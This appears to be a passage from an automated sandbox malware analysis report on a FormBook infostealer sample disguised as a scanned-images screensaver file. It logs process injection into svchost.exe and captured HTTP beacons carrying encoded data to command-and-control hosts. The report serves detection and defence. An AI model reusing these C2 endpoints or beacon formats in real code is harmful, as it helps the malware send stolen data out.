                                                                              Data Raw: 77 7a 34 3d 62 30 65 74 32 51 63 50 63 62 31 73 65 50 4d 6b 69 65 33 6e 36 75 55 6c 52 68 4c 35 4c 44 55 31 32 33 33 56 68 6a 77 61 79 36 77 77 4c 51 46 34 77 2f 65 6c 5a 43 36 41 55 73 7a 39 52 76 33 77 74 76 4c 50 78 48 42 61 34 52 52 48 78 76 70 65 6f 44 49 76 6a 72 78 45 6f 38 53 42 46 63 47 30 66 6d 72 47 59 59 77 37 4a 50 5a 69 6f 74 39 36 4c 68 73 71 36 6f 4e 75 37 69 69 64 39 32 2f 67 31 54 6f 71 6b 4c 6b 73 75 33 69 4c 32 67 56 67 4d 52 61 58 4a 72 31 2f 39 54 6e 4f 61 51 77 52 44 32 62 69 39 4a 7a 36 54 35 58 53 70 6e 6e 6a 6c 51 50 50 48 58 30 68 6d 79 44 6a 6e 48 55 73 38 67 6f 64 35 6f 5a 59 48 39 6f 50 6a 5a 33 66 2b 62 2f 57 4b 54 73 3d
                                                                              Data Ascii: wz4=b0et2QcPcb1sePMkie3n6uUlRhL5LDU1233Vhjway6wwLQF4w/elZC6AUsz9Rv3wtvLPxHBa4RRHxvpeoDIvjrxEo8SBFcG0fmrGYYw7JPZiot96Lhsq6oNu7iid92/g1ToqkLksu3iL2gVgMRaXJr1/9TnOaQwRD2bi9Jz6T5XSpnnjlQPPHX0hmyDjnHUs8god5oZYH9oPjZ3f+b/WKTs=


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              31192.168.2.45761420.244.96.65804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:26:39.842066050 CET10823OUTPOST /rdfj/ HTTP/1.1
                                                                              Host: www.quickcommerce.cloud
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.quickcommerce.cloud
                                                                              Referer: http://www.quickcommerce.cloud/rdfj/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 10300
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Raw: 77 7a 34 3d 62 30 65 74 32 51 63 50 63 62 31 73 65 50 4d 6b 69 65 33 6e 36 75 55 6c 52 68 4c 35 4c 44 55 31 32 33 33 56 68 6a 77 61 79 36 6f 77 49 69 4e 34 69 4d 47 6c 44 43 36 41 64 4d 7a 38 52 76 33 58 74 76 54 4c 78 48 64 4b 34 54 70 48 6a 65 4a 65 76 77 51 76 74 72 78 45 67 63 53 41 50 38 47 45 66 69 48 61 59 59 41 37 4a 50 5a 69 6f 72 35 36 64 67 73 71 34 6f 4e 70 73 53 69 5a 35 32 2f 63 31 54 77 36 6b 4c 77 57 75 48 43 4c 33 41 46 67 50 69 69 58 55 37 31 39 38 54 6e 57 61 51 4d 4f 44 32 76 6d 39 49 58 55 54 2b 6e 53 6f 79 36 37 78 69 43 55 46 52 59 35 6b 79 36 45 2b 6c 49 48 31 68 63 53 79 4c 56 79 63 66 67 51 74 37 2f 51 35 70 7a 4a 4c 45 43 54 37 68 42 34 51 58 4b 54 4f 54 70 45 41 6f 51 64 58 6d 38 51 54 61 49 5a 55 34 37 42 4c 76 6e 6b 75 78 58 69 70 70 47 2f 42 32 76 62 47 43 66 35 4d 57 45 71 57 71 63 37 66 57 4b 53 4f 6b 7a 30 4d 73 45 4a 58 51 32 7a 47 6f 76 58 6b 4c 43 78 62 4f 4c 58 6d 4a 4d 74 6e 37 58 54 55 42 74 59 34 49 6b 54 4e 68 34 67 35 77 50 30 34 47 61 63 68 42 69 5a 45 68 [TRUNCATED]
                                                                              Data Ascii: wz4=b0et2QcPcb1sePMkie3n6uUlRhL5LDU1233Vhjway6owIiN4iMGlDC6AdMz8Rv3XtvTLxHdK4TpHjeJevwQvtrxEgcSAP8GEfiHaYYA7JPZior56dgsq4oNpsSiZ52/c1Tw6kLwWuHCL3AFgPiiXU7198TnWaQMOD2vm9IXUT+nSoy67xiCUFRY5ky6E+lIH1hcSyLVycfgQt7/Q5pzJLECT7hB4QXKTOTpEAoQdXm8QTaIZU47BLvnkuxXippG/B2vbGCf5MWEqWqc7fWKSOkz0MsEJXQ2zGovXkLCxbOLXmJMtn7XTUBtY4IkTNh4g5wP04GachBiZEhICtHoY0W/UkvpiwuhINN96rSl+dS0e11Qlfz6BISPq/AYvqy4wNYJtckebc3yt61YMYTU/T6T0kYWmBEJk5ygjNyVNEO47KvMlwPiO1yEgPrCniNHrdAp3yRTpT3DN2UQ+IrWDoBHw3d9hWUOfVVBUCetvH6i7YO8FrD5FobfpmK2o9EiQOTJb48zl8rIO5Ftmalayts3BJHSvMGmgxbMTt8rB7WPJIG5NxAKbwcTQOY6cw4jgimajSu7j6mKtfX42cdiQqAJd52tX3BKTPYNMpWIrEPyDoZ6JwXipJlbprJmW+OGV/WZGcdaGaLc175hPKYFm7R4eavsv8nfGzJx/+hPjqd2oPI22fk+NM2hjlFcpQSNoJbyFtcvIw34NMKPc7Rzm/lryO4XzirFy4IRX8veMga8ypChwzTnr+GPHI1PZFLdbU0YC5LP5tiG98e9d2n2CRWb56zJMCtcO9XFd0f0lQfVWPeJTj6Q1GDXSGafhMJlRqsMLj+Namk+p6vK/WZCFYQc4JhcQGqAFdBjhDFnprK8gz/4Pm9s3xHgs7ZG6dViGg7noQZxeQ0apTbz1VSVFeD2ovyOHL6BxBSOY4FyhqTC7GJc68lWcpc/4WSdeGQ7U4N50Q6DDyNGJRfmM0ygtEGFNx2D9M7hzTmJcMMxG5UPK52PS [TRUNCATED]


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              32192.168.2.45761520.244.96.65804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:26:42.389491081 CET446OUTGET /rdfj/?wz4=W22N1n9VK5BsDegKssi59d1tdmClQzQM6krhrjkO5qQUOhZ23fqPP0igRbfRb/LgqczUnn1NrDdL/bN6nwlekL5Do//GTuaTPhPlYdtLOoB+gLN1EC4FlrA=&OvV=2njD6f80EDOLQ8 HTTP/1.1
                                                                              Host: www.quickcommerce.cloud
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Jan 14, 2025 10:26:43.766833067 CET646INHTTP/1.1 301 Moved Permanently
                                                                              content-type: text/html; charset=UTF-8
                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              cache-control: no-cache, must-revalidate, max-age=0
                                                                              x-redirect-by: WordPress
                                                                              location: http://quickcommerce.cloud/rdfj/?wz4=W22N1n9VK5BsDegKssi59d1tdmClQzQM6krhrjkO5qQUOhZ23fqPP0igRbfRb/LgqczUnn1NrDdL/bN6nwlekL5Do//GTuaTPhPlYdtLOoB+gLN1EC4FlrA=&OvV=2njD6f80EDOLQ8
                                                                              x-litespeed-cache-control: public,max-age=3600
                                                                              x-litespeed-tag: 89f_HTTP.404,89f_HTTP.301,89f_404,89f_URL.246f60e15357fcc9eb3214bcdd20f5a9,89f_
                                                                              x-litespeed-cache: miss
                                                                              content-length: 0
                                                                              date: Tue, 14 Jan 2025 09:26:43 GMT
                                                                              server: LiteSpeed
                                                                              connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              33192.168.2.45761684.32.84.32804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:26:56.913213968 CET706OUTPOST /8vp1/ HTTP/1.1
                                                                              Host: www.xpremio.online
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.xpremio.online
                                                                              Referer: http://www.xpremio.online/8vp1/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 200
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Raw: 77 7a 34 3d 79 4a 37 41 55 53 67 78 6a 69 7a 6e 35 6b 4f 35 62 52 46 61 54 69 33 62 42 77 41 2b 64 71 2f 4b 51 64 6d 37 37 7a 61 65 46 51 61 6a 34 58 59 52 54 79 73 36 6d 2f 58 4d 41 34 6a 31 77 43 57 75 58 51 59 4c 2f 72 54 44 31 74 6a 61 6b 44 62 31 65 63 34 2b 33 63 75 55 6a 4d 68 34 49 70 66 73 71 66 31 4f 4d 4e 38 4e 71 31 71 5a 76 4c 41 55 58 35 35 53 55 65 2b 59 5a 33 42 4e 52 32 42 32 68 47 39 65 63 2f 66 77 6b 6e 50 42 38 7a 70 59 55 76 63 2b 64 33 47 53 52 76 33 71 79 5a 47 2b 76 6a 39 47 38 35 50 6b 64 74 4d 78 77 46 31 4d 6e 75 61 43 62 37 52 48 4d 74 4c 37 57 46 4c 39 78 67 3d 3d
                                                                              Data Ascii: wz4=yJ7AUSgxjizn5kO5bRFaTi3bBwA+dq/KQdm77zaeFQaj4XYRTys6m/XMA4j1wCWuXQYL/rTD1tjakDb1ec4+3cuUjMh4Ipfsqf1OMN8Nq1qZvLAUX55SUe+YZ3BNR2B2hG9ec/fwknPB8zpYUvc+d3GSRv3qyZG+vj9G85PkdtMxwF1MnuaCb7RHMtL7WFL9xg==


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              34192.168.2.45761784.32.84.32804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:26:59.450258017 CET726OUTPOST /8vp1/ HTTP/1.1
                                                                              Host: www.xpremio.online
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.xpremio.online
                                                                              Referer: http://www.xpremio.online/8vp1/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 220
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Raw: 77 7a 34 3d 79 4a 37 41 55 53 67 78 6a 69 7a 6e 34 48 57 35 49 43 64 61 43 53 33 61 59 41 41 2b 45 36 2b 69 51 64 36 37 37 79 75 4f 47 6c 43 6a 32 56 51 52 53 33 41 36 7a 2f 58 4d 49 59 6a 77 2f 69 57 35 58 51 6b 31 2f 71 76 44 31 74 33 61 6b 48 4c 31 65 74 34 35 30 73 75 61 73 73 68 36 48 4a 66 73 71 66 31 4f 4d 4e 42 69 71 31 43 5a 75 36 77 55 56 64 74 54 64 2b 2b 62 61 33 42 4e 62 57 42 79 68 47 38 4a 63 37 66 4b 6b 6c 48 42 38 7a 5a 59 4e 65 63 35 55 33 47 63 56 76 32 57 38 34 6a 54 72 32 4d 64 68 59 54 33 55 4d 67 74 34 6a 34 57 32 66 37 56 4a 37 31 30 52 71 43 50 62 47 32 30 71 6d 35 32 51 68 30 37 69 5a 64 45 45 4c 34 59 59 68 63 44 46 6a 49 3d
                                                                              Data Ascii: wz4=yJ7AUSgxjizn4HW5ICdaCS3aYAA+E6+iQd677yuOGlCj2VQRS3A6z/XMIYjw/iW5XQk1/qvD1t3akHL1et450suassh6HJfsqf1OMNBiq1CZu6wUVdtTd++ba3BNbWByhG8Jc7fKklHB8zZYNec5U3GcVv2W84jTr2MdhYT3UMgt4j4W2f7VJ710RqCPbG20qm52Qh07iZdEEL4YYhcDFjI=


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              35192.168.2.45761884.32.84.32804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:27:02.001713037 CET10808OUTPOST /8vp1/ HTTP/1.1
                                                                              Host: www.xpremio.online
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.xpremio.online
                                                                              Referer: http://www.xpremio.online/8vp1/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 10300
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Raw: 77 7a 34 3d 79 4a 37 41 55 53 67 78 6a 69 7a 6e 34 48 57 35 49 43 64 61 43 53 33 61 59 41 41 2b 45 36 2b 69 51 64 36 37 37 79 75 4f 47 6d 69 6a 32 6d 49 52 54 51 30 36 31 50 58 4d 4c 59 6a 78 2f 69 57 6b 58 51 4e 79 2f 71 69 32 31 76 50 61 6c 67 6a 31 59 66 41 35 76 38 75 61 6e 4d 68 37 49 70 66 31 71 63 64 43 4d 4e 78 69 71 31 43 5a 75 34 6f 55 52 4a 35 54 62 2b 2b 59 5a 33 42 4a 52 32 42 57 68 47 6b 5a 63 37 54 61 6b 55 6e 42 38 58 39 59 50 4d 30 35 4a 48 47 65 5a 50 32 4f 38 34 66 51 72 33 6b 52 68 59 33 5a 55 50 38 74 34 6c 45 4e 79 39 71 4b 66 71 74 39 43 74 6a 6b 55 6b 32 70 6d 42 67 4c 64 7a 4e 69 69 61 78 62 43 70 70 55 42 6a 38 58 47 6e 30 75 52 51 5a 39 6b 7a 2b 78 75 76 59 71 68 39 43 75 4b 62 73 57 6d 44 2f 67 67 62 76 75 48 56 4a 38 45 4c 73 52 33 4d 37 37 4a 6f 33 6b 55 49 41 6f 44 64 47 68 7a 30 33 51 4e 4d 6b 41 64 69 45 65 66 75 67 69 37 47 54 6a 78 43 62 33 67 72 33 66 33 76 68 59 38 46 58 42 74 72 61 37 57 62 33 72 61 57 64 4e 47 64 78 6a 49 74 4a 57 72 56 4e 56 2b 36 6b 43 31 4b [TRUNCATED]
                                                                              Data Ascii: wz4=yJ7AUSgxjizn4HW5ICdaCS3aYAA+E6+iQd677yuOGmij2mIRTQ061PXMLYjx/iWkXQNy/qi21vPalgj1YfA5v8uanMh7Ipf1qcdCMNxiq1CZu4oURJ5Tb++YZ3BJR2BWhGkZc7TakUnB8X9YPM05JHGeZP2O84fQr3kRhY3ZUP8t4lENy9qKfqt9CtjkUk2pmBgLdzNiiaxbCppUBj8XGn0uRQZ9kz+xuvYqh9CuKbsWmD/ggbvuHVJ8ELsR3M77Jo3kUIAoDdGhz03QNMkAdiEefugi7GTjxCb3gr3f3vhY8FXBtra7Wb3raWdNGdxjItJWrVNV+6kC1KamQl7hE2tz/5TYB9ey6LqUJ+Kauv4dpdKMyb6AWn+VOLNzU1u7PWzPAqBGA4zvZt/v3pnxQZdMCtM6PD9uLiQAuPdiYIgL5Iz7tm6W6EK2sVLWBNzERCRA0b0VQVDUhx87rxDS4v+Abcr6MydkUxxNvBHCb3SYj+PW/xrotSd9rd0tZZDflMMECobVEIA4a/+4BRlWxppZGzElvnpSwp0FdiPwXK84rVQF6/azYJagdFvj8CApp10f6Z7UAZ4yO5BlAZ6JNLOqIoGSNfFTzdr1tFbqMDTYkCZpPqQhjR8ZLWVZitJTNa96xOK9/xx4lr0LW/UF7/U/mBP7RzyS9VZlyzo0Bq3EUKWF4K+KrdEm3H7i+/5knAMXmLAy5UJqV59b4XqyaHh35gi7PHsfJGGIleDyl0ujUgA4hCKMHMfZj9/ipYWZ0BVUMxN0VYO0gktTCR0HQ/MenZ9u3HgdI90ilSDMEQqz4CnvwmIu6I43/UlqeIbAgUKfNYzJYwRo+C0YCx6DXJ8yf5ChQitg+6rJ4HCXFQEaiB6MIamLjOzRxwX9HzykU9Y16KzTX5UPfsyPxlT+8wxsEnBaRRfjWMkC25gSFNiSFCqyNUfRVwUiFHRhIPg8MEBqBGpLGq8CB/7B0NrH2I74o4QLJuFucI5MS8BGtR35pQq8 [TRUNCATED]


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              36192.168.2.45761984.32.84.32804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:27:04.672426939 CET441OUTGET /8vp1/?wz4=/LTgXn1km3iwlVyiegwnGjWZZFB0eLisfcmkyyqxOnWJ8H9CeAgPjsH/KIvj3CyMdhcMqJeWq/63o3TMWNYzsf+ek40CYofT8u9WJYZhwl3Hq5liXp4GPpE=&OvV=2njD6f80EDOLQ8 HTTP/1.1
                                                                              Host: www.xpremio.online
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Jan 14, 2025 10:27:05.120187044 CET1236INHTTP/1.1 200 OK
                                                                              Date: Tue, 14 Jan 2025 09:27:05 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 9973
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Server: hcdn
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              x-hcdn-request-id: 907e6d0a26500b5a5b81ff370f04a723-bos-edge2
                                                                              Expires: Tue, 14 Jan 2025 09:27:04 GMT
                                                                              Cache-Control: no-cache
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                              Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                                              Jan 14, 2025 10:27:05.120206118 CET224INData Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                                              Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30
                                                                              Jan 14, 2025 10:27:05.120229006 CET1236INData Raw: 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 33 33 33 7d 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 7d 68 33 7b 66 6f 6e 74 2d
                                                                              Data Ascii: px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:600}h3{font-size:22px;font-weight:600;line-height:28px}hr{margin-top:35px;margin-bottom:35px;border:0;border-top:1px solid #bfbebe}ul{list-style-type:none;margin:0;padding:0
                                                                              Jan 14, 2025 10:27:05.120243073 CET1236INData Raw: 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 74 6f 70 2d 63 6f 6e 74 61 69 6e 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 7d 2e 6d 65 73 73 61 67 65 2d 73 75 62 74 69 74 6c 65 7b 63 6f 6c 6f 72
                                                                              Data Ascii: lign:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;line-height:32px;margin-bottom:16px}.message{width:60%;height:auto;padding:40px 0;align-items:baseline;border-radius:5px;
                                                                              Jan 14, 2025 10:27:05.120258093 CET1236INData Raw: 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 34 70 78 20 38 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30
                                                                              Data Ascii: align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:100%;padding:35px 0}.container{margin-top:30px}.navbar-links{disp
                                                                              Jan 14, 2025 10:27:05.120274067 CET1236INData Raw: 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f 65 6e 2f 20 72 65 6c 3d 6e 6f 66 6f
                                                                              Data Ascii: cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www.hostinger.com/affiliates rel=nofollow><i aria-hidden=true class
                                                                              Jan 14, 2025 10:27:05.120301008 CET1236INData Raw: 66 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 46 69 6e 64 20 79 6f 75 72 20 68 6f 73 74 69 6e 67 20 70 6c 61 6e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69
                                                                              Data Ascii: f=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add website to your hosting</div><br><p>Add your website to any
                                                                              Jan 14, 2025 10:27:05.120316029 CET1236INData Raw: 2c 74 3d 6f 2e 6c 65 6e 67 74 68 3b 6e 3c 74 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d 28 36 33 34 38 38 26 28 72 3d 6f 5b 6e 2b 2b 5d 29 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 65 6e 63 6f 64 65
                                                                              Data Ascii: ,t=o.length;n<t;){if(55296==(63488&(r=o[n++])))throw new RangeError("UTF-16(encode): Illegal UTF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}return e.join("")}};va
                                                                              Jan 14, 2025 10:27:05.120407104 CET1236INData Raw: 2c 74 26 26 79 2e 73 70 6c 69 63 65 28 66 2c 30 2c 65 2e 63 68 61 72 43 6f 64 65 41 74 28 64 2d 31 29 2d 36 35 3c 32 36 29 2c 6d 2e 73 70 6c 69 63 65 28 66 2c 30 2c 61 29 2c 66 2b 2b 7d 69 66 28 74 29 66 6f 72 28 66 3d 30 2c 77 3d 6d 2e 6c 65 6e
                                                                              Data Ascii: ,t&&y.splice(f,0,e.charCodeAt(d-1)-65<26),m.splice(f,0,a),f++}if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m[f]).toUpperCase().charCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w
                                                                              Jan 14, 2025 10:27:05.120420933 CET200INData Raw: 6d 61 74 63 68 28 2f 5e 78 6e 2d 2d 2f 29 3f 70 75 6e 79 63 6f 64 65 2e 64 65 63 6f 64 65 28 74 2e 73 6c 69 63 65 28 34 29 29 3a 74 29 7d 72 65 74 75 72 6e 20 65 2e 6a 6f 69 6e 28 22 2e 22 29 7d 7d 2c 70 61 74 68 4e 61 6d 65 3d 77 69 6e 64 6f 77
                                                                              Data Ascii: match(/^xn--/)?punycode.decode(t.slice(4)):t)}return e.join(".")}},pathName=window.location.hostname,account=document.getElementById("pathName");account.innerHTML=punycode.ToUnicode(pathName)</script>


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:04:23:59
                                                                              Start date:14/01/2025
                                                                              Path:C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe"
                                                                              Imagebase:0x450000
                                                                              File size:1'613'824 bytes
                                                                              MD5 hash:17CBB82B7DB7A77DF6507DD32AF10563
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:1
                                                                              Start time:04:24:00
                                                                              Start date:14/01/2025
                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe"
                                                                              Imagebase:0x30000
                                                                              File size:46'504 bytes
                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1829643197.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
